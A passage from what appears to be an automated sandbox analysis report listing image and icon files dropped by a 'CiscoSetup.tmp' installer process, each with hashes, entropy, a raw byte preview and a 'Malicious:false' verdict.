                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~....SIDATH..U.Q.0.}e.. ...............N@..3I.A.!.../.......r......SXTW.t..3.n..g.....!/k.t..{....=.^.+E.U..KD.@..@..)..sV...7u..[!_+..F.......#.......?$....3.t....;8.D...N.pv.H...Q\r.....T.t..t..F......~....1a3g......Y..L.#.F%..-.(.o...bl.}..=...T.d2.[.x".m..b.V*./........T...(..+.>[F5....7..j..2:....-;.....P.w|j..d.s.........&.cO........IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2213
                                                                                                                                                                                                  Entropy (8bit):4.905752993252195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                                                                                  MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                                                                                  SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                                                                                  SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                                                                                  SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......&.....2b.5....PLTE...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................h....pHYs................ iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 20
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12252
                                                                                                                                                                                                  Entropy (8bit):7.977665916091742
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                                                                                  MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                                                                                  SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
                                                                                                                                                                                                  SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                                                                                  SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....&......!.O....Z.(.....[p....w...X.Hp.uKp...&.+V.....A/.S[.l.....j.}...b$...M..gf.9..;7......;3g......)WH.]...*.>.y..t......6.O'N..8.#.v<..Kv........y....;q.....(..mG..8]..G...]...."l>........vd.C.....nHp...v!....Ks^?I.T..1%.U..s/...+.I.{Yv.2."/...`.p.........1?8L."lDo.e...O/..~..[..o..>. .o....-.=.]h.g.Y.......F.4g..../..x.......C.?..#...%.2...PNz...............-...i..8}.e?.......]~... *.......t..l...FD.g`........3g\I.,ZD.7.+.....:7.6....J.T*.?.f".....8.X.:2.j?......LK..G....h..l[...v|...9.[p.6.<....$....\...^.o....Ti../.{.HQ.ID...o.jl.A..(......./...".6.'..V.....T....~...I....,t..Hh.zT.G...njG&...7.MIE.g....../S...i,..Z..D*.D._..H. ..3......Y.*.2...O.........&.......)?...%.c.........eG.o..I,.N....wI..[:......./..+B..$..]l._..T..2<....;.v.~5t.I/..?..=..&.....U....L...L.....|...0...w.....V....*-.x.D..8...K/.d)......kj."......g*wo}\V.Q..8.).....?'..wP..?5A....K.1?8...e.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.5904244181066343
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                                                                                  MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                                                                                  SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                                                                                  SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                                                                                  SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ..........................@...@...@...@...@...@...@...@...@...@...@...@...@...@.........................p...0.............................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................p.....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'..M'..M'..M'..nP:...w................`.............................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..z]J.z]J.X5..M'..M'..M'..M'..z]J......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................nP:.M'..M'..M'...................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................M'..M'..M'..M'...xh..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................cB+.M'..z]J.M'..M'...xh......................@...s...s...s...s...s...s
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):421
                                                                                                                                                                                                  Entropy (8bit):7.268682924293009
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                                                                                  MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                                                                                  SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                                                                                  SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                                                                                  SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~....WIDATH..U.m.0..".`...n@&..N.J..e.Ke.t.....x.2.#T.v...Z=)R..w.>.3r..*~.....k.k.).q....^.....`.k..'.tG.......X.:Kf..=..7-........Md..`.....L.H.{..K.%D.~.i.$.F..z....*]Q....Y@.f..D...C|j.!\gi...q..R.1...2..K.....=..,..%...p+.(iW....#......r....N...=........C.8[..\<.a....2[n....B, #...u.09......a...;........._U.)K2...pb.LW...~^.......hSX.....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4052
                                                                                                                                                                                                  Entropy (8bit):7.943954771539964
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                                                                                  MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                                                                                  SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                                                                                  SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                                                                                  SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...vIDATx..Y.o\.u?w.3sg..E..H..D-..YV.8n. J..H.......>...C...@..M..o...H..)...]4F....%...Lq.9.>w..|3#.L...h...K....9..;.|C...%}..)a...8..8IJ.H.;o.6.W'.Y.F.L^...a@(....K.)53....3...P,.2.=.I...6....]iV.v....r.....~yk..ej6..]...._8M..R.g.......f.[.......e,.,..i.I.D-.j..J.n....r...U.\[./....U6.$o^..ZE..7@J..I....5>.[g.:..gfBs.qy0....A..........HU%RdY..t=.,6....../5..;.\.....+/x..O...h'...1...8w~..o^=......v.Vk....wc.KA.:..."....D....)..R.e......}..{..w^.....Kd..}.]?7..lJ....O<..o^..../_>.d-.<.i....`{>.O>.w`./.dF.Rt...I..Q..{[0..J..h....T....RB...;.........]o...H...s.._.......L./O.P.....WT.P.A.....@..%RM....6@{....R5....5....M.....~....I...1s.K}.$..H.}./o.=...:..th...9=w.....(.R'-l......Lx. ..iP.iCu:.`.....\nP8.".......VoS8bR.......:..-....7..L).......M.j.rlv.......~..A9..ux.T.)_.S$.....6..<g..{..7..0...+...&h.f..%..\x^.h....1....(.....u):.S.N....Z....i....?.L_..+..%...]x..o...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1577
                                                                                                                                                                                                  Entropy (8bit):5.942243839150427
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                                                                                  MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                                                                                  SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                                                                                  SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                                                                                  SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:31:46-04:00" xmp:ModifyDate="2018-10-19T17:56:14-04:00" xmp:MetadataDate="2018-10-19T17:56:14-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:1181fb18-be64-4155-ab97-06d5464c99e6" xmpMM:DocumentID="xmp.did:1181fb18-be64-4155-ab97-06d5464c99e6"
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4267
                                                                                                                                                                                                  Entropy (8bit):7.94257084168463
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                                                                                  MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                                                                                  SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                                                                                  SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                                                                                  SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...MIDATx..Zyl..u.s......x..$J.i).l.......6..8.k.h`....(Z.UZ.Q.-....4n...l...6r.@r.#J.K.M..O.7w.......{..R.E.....@.vvw...{..~..~....u7.).......Np..r..K.(f..%!.LB1k....p.......E..l.........x.."{$.Wl..hY.lAO.R..B*>d....c...D?.........*.......=...[....N....;.|..d.T.&..q..."....I...pi8...?...6...s.R.....z.......U5.pM{.j..C..k..wW.....W.e..X.....9"...Q.@.y.G.,.x<....Y...]....\.wn.........YsI..+.....m.?.o..^...`@:]...w#.sv....x....@..0As....!...j.^.q.~..G..z~x....q.....J..a......6=td.=.M..Z.k*..,.#......i.......xP......S.A. o.y.`A*.C.i%..5~......_.Y.?/.%.=z..dr...N..X.lz.....|......x.s6.d.". ........l....@Te.C.)..E..@..%.$..e.&..r..g...9.]k}.t..R...%..6..{............G^.o....F.!.F..Ar*`.<....L...&......S..y|..,$.Yp......A.X.t..N..q.....d.p0.A[S....m...2.g..nr...U...../.vu.........Z".Cl6.....Dt...s2.....l.`.(Z.x.2h...3.f....M.<.F.H)......q.H..p...n.M.......T..._..v?..5(x....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4144936482461397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                                                                                  MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                                                                                  SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                                                                                  SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                                                                                  SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P.........................@...@...@...@...@...@...@...@...@...@...@...@...@...@..................................... .....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................................kY.X5..M'..M'..M'..M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................0...........cB+.M'..M'..M'..X5..z]J.z]J.z]J.nP:..@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................0.........kY.M'..M'..X5....w..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@.................0........nP:.M'..M'.......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................nP:.M'..X5...........................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..................z]J.M'..X5
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2002
                                                                                                                                                                                                  Entropy (8bit):7.874049849617631
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                                                                                  MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                                                                                  SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                                                                                  SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                                                                                  SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..{lSU...vK.nl%.6..... ...0.q#D.?d....C1!j..G.Q0.,A:b.q..5d...L%...H..I@.9..B.G..E.=.SN.n....n.&..]...........A1..Z\BD6"..G.?..AD.~....l?...G...Z.KD.DTAD%.{.V,a....(#=..{..a:........)/.H-Dt..l.f....l-.p(5.;.ge2 E.K.....ro?....9v.9.....r.m...8.-.....JW.....K............\..]OP..R...lz...J...|P..uP.-.*..J3 ...Ui.......OxcK..@...L.Bl..8....{M.b...m.b.1....^.(...UG.M..2[..x..k.[K;.=G.SR5.....Fh{...|..qo..8....PR._0[..&...SR....^..(M.d6.B .Lek...<j;}.r.s..k........q8M........z..5..MkV/..?]J......kw8.B.b..:...qW...U.g^..O.}.|/$@.s..0].r..twR..o.7.....4.J.Gs-6.....C.@..Ho8.s..0u...{..r3.Ri.S.U.B....Vm...Y...9.K}.`..7U..y..I.....j................+..d.p].'.>.O..U.....<....F..X.....9.M..5w....e>@wO[.<C).r.|.Z.....e.....t..>............E].N:xa...,)Y....T4.a.~.U..0.^U8.A..............|Y.....@O...)?)..9.v^...W.#.2-M.:M.@..O.......l....T..L.....,..P.''...E...ZUX@-..P.V&eX.......M*...<.c+.A....K...V.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14308
                                                                                                                                                                                                  Entropy (8bit):7.981829207860698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                                                                                  MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                                                                                  SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                                                                                  SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                                                                                  SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....{.......!.}V...U.`...Z..X.....j.j.\*!.V..P..........OM.AhQ.l.[5... .\ ,.{~s..g.=g..v....'..ef..w._J.bn.)(.-$.m....l.....[k..47..G..v....W.5...5.Wz.....'.._6@.$@....>....].g.....=..G......V$;.'..........._6 .$@..WY.U....)q;U+.V].[..qR..a..T.\O...Y....u.v).q.-..d+..]...._s<.X..sJc.TO..v.G.og....Z>T...'.`.[.x;....l....>...e.:.x...|.n.d.=....2.aKt;.....}....W.B/<6%.D*......?q....I..:~..}a.d.`'a....+R.')8..|j.....W.s..w*.|.I.oy:....'aO...txa...w....M.)..!q.S.>g1..+V.{.wL..eO.x.......a...k#.[....^....b.D4.z.....X;..e.d..O.a.D...%...+H....u^.{..vm.....c5.Kl..+.V.....&.n]:KO......l;...Q../.r*.U..........6n.....p.^...4.......1..].i..C..%O.q.W5.4....;..h..].I.B.(....-.ex..:.l.....i.N..qp..=...I_..8.E.I.j...R/.i.1..x.............?.&o......W.57.5..t...E..%D.<..@3N"*..b%8Q.1..1....V.B..8Q.o.....).<...1.T.x.L...h...KdOc..V3..E...Z'9(.<.U'.D.....MY........4...}...R.rL........g
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.01754566314674
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                                                                                  MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                                                                                  SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                                                                                  SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                                                                                  SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T18:00:07-04:00" xmp:MetadataDate="2018-10-19T18:00:07-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c52f4fb1-426f-49c5-a2f3-2e915bfa2393" xmpMM:DocumentID="xmp.did:c52f4fb1-426f-49c5-a2f3-2e915bfa2393"
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1807
                                                                                                                                                                                                  Entropy (8bit):7.846793911413473
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                                                                                  MD5:536C911881523B9F8402A481881992A0
                                                                                                                                                                                                  SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                                                                                  SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                                                                                  SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..;R#I..k.........1...h.@'..:.V...1'.q..kM...Ly..h..6J.=....Y.%E~...!..wVe... .. .. .. ....O;....I..UO...........R.........7...E)5W.d...Q.)J5.7\{....Q.W.P.R.a.@.*K......ab...Q.d..zV....^..m.C.t..U.Y.e..(.....x.J)...s.....)..XM....Y.._~Q......o#..........=.p+b.E..X..X.}.'..o...DJw..GJq.].^.%R.#..3.y<.s...5.......s.s....;>.Z.q.F./..r.Z...T..=.&H......z...~J/.%.....(.~.|R7...z.LV....+.........T....|L.1i<..Zc.]LO.;.@.:.?IU./..A.,.-.rGr!Z...'I.........6+^......a....n6~e6ejy.f.........\UC..\..i..s.r.U_.i..>......u...p...zb5..t|u.h.*gxD..}6T[i.jxO./..goc...9......(.[..........*.{.8.f.(..R..J8.za.;.t..aj./.5.^px....g[...]z...=.Q.Q.%.D...z2`.;.6.K9.26Tc'....)_...$..<.&.7v.....pQ..N....s.c...XX..x.>..O.....)&/IYm..=....7.A.......c$..R....T{.q......C..@.L.....]({..>y.:.e.#....ym.....g^.R.....v.$.M.B.E....^.xSF80......n|Ph./..%<.I...X.f..=.pz..~...a..O1.9g.m.Mp....n.v%D....w....F6.....{.".!.~.}..}.P.S.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.7071518309363354
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                                                                                  MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                                                                                  SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                                                                                  SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                                                                                  SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P..........!...................................................................!.................................... .....................,3..................................................................#,.............................................kY.M'..M'.. *%..5C..........................-9..-9..........................(2..0;u.......................0............cB+.M'..M'..M'..X5..z]J......y.......................1=..1=......................[q...'........................0.........xh.M'..M'..X5........................#......................................................DU*................... ........nP:.M'..M'....w..........................,0..az...................'...'..................7F..9G.............................z]J.M'..X5..............................................................................|....#.................................M'..X5
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):51094
                                                                                                                                                                                                  Entropy (8bit):7.977081753425093
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                                                                                  MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                                                                                  SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
